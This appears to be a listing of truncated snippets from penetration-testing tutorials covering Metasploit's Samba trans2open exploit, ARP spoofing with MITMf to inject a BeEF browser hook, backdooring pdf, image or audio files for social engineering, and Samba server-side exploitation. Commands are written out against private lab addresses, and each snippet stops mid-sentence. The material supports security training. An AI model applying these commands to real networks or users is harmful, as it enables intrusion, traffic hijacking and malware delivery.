OSCP Security Technology - Gaining Root with Metasploit Analysis nmap scanning result. searchsploit samba 2.2 msfconsole search trans2open use exploit/linux/samba/trans2open show options set rhost 192.168.2.28 show targets exploit We need change t
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hoo
CLIENT SIDE ATTACKS Backdooring ANY file Combine backdoor with any file - Generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original(pdf, jpg, mp3) file to an
Server Side Attack Analysing scan results and exploiting target system. Go to the Analysis page and find the target host. Scan restult - services: Scan resulst - Vulnerabilities: Scan result - credentials: Try to login the database using
Sever side attacks code execution Let‘s analyze the Zenmap scan result first and search for something vulnerabilities about Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
